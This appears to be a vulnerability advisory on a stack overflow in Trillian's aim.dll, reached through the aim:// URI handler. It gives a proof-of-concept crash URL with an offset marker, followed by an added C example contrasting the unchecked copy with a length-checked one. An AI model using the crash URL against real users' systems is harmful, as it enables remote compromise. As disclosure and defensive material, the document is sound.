Stack Overflow in Trillian’s aim.dll through the aim:// URI


 

The Trillian application is a tool that allows users to chat across multiple protocols, such as AIM, IRC, ICQ, Yahoo!, and MSN.

When Trillian is installed, the aim:// URI will be registered in the Windows Registry and associated with the command

Rundll32.exe "C:/Program Files/Trillian/plugins/aim.dll", aim_util_urlHandler url="%1" ini="c:/program files/trillian/users/default/cache/pending_aim.ini"

As you can see, calling the aim:// protocol will spawn a Rundll32.exe process which will load aim.dll with the specified options. The value that is put into aim_util_urlHandler url is controlled by the user through the URI, such as aim://MyURL. This value is later copied without bounds checking, and an attacker can use this to cause a stack overflow exception. Accessing the following URL from IE6, IE7, or Firefox will trigger a stack overflow:

 

aim:///#1111111/1111111111111111111111111111111111111111111111111111111111111

2222222222222222222222222222222222222222222222222222222222222

3333333333333333333333333333333333333333333333333333333333333

4444444444444444444444444444444444444444444444444444444444444

5555555555555555555555555555555555555555555555555555555555555

6666666AAAABBBB6666666666666666666666666666666666666666666666

6666666666666667777777777777777777777777777777777777777777777777777777777777

8888888888888888888888888888888888888888888888888888888888888

9999999999999999999999999999999999999999999999999999999999999

0000000000000000000000000000000000000000000000000000000000000
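An added example, not code from Trillian or from the original post: a C sketch of the unchecked copy described above beside a length-checked version that rejects an overlong aim:// value. The buffer size `URL_BUF_LEN` and all function names are assumptions, since the page does not show aim.dll's code.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size: the page does not give the real buffer length in aim.dll. */
#define URL_BUF_LEN 256

/* Pattern the advisory describes: the url= value is copied with no length
 * check. Shown for contrast only; never called in this example. */
void copy_url_unchecked(char *dst, const char *uri)
{
    strcpy(dst, uri); /* overruns dst once strlen(uri) >= its size */
}

/* Hardened form: accept only aim: URIs that fit, terminator included.
 * Returns 0 on success, -1 on rejection (dst is left as an empty string). */
int copy_url_checked(char *dst, size_t dst_len, const char *uri)
{
    static const char scheme[] = "aim:";
    size_t n;
    if (dst == NULL || dst_len == 0)
        return -1;
    dst[0] = '\0';
    if (uri == NULL || strncmp(uri, scheme, sizeof scheme - 1) != 0)
        return -1;
    n = strlen(uri);
    if (n >= dst_len)          /* no room for the terminating NUL */
        return -1;
    memcpy(dst, uri, n + 1);
    return 0;
}

/* Constructed input: an aim:// URI padded with filler to total_len bytes. */
int try_uri_of_length(size_t total_len)
{
    char uri[1024], dst[URL_BUF_LEN];
    if (total_len < 8 || total_len >= sizeof uri)
        return -2;
    memset(uri, '1', total_len);
    memcpy(uri, "aim:///#", 8);
    uri[total_len] = '\0';
    return copy_url_checked(dst, sizeof dst, uri);
}

int main(void)
{
    printf("short: %d, overlong: %d\n", try_uri_of_length(32), try_uri_of_length(700));
    return 0;
}
```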

 

 
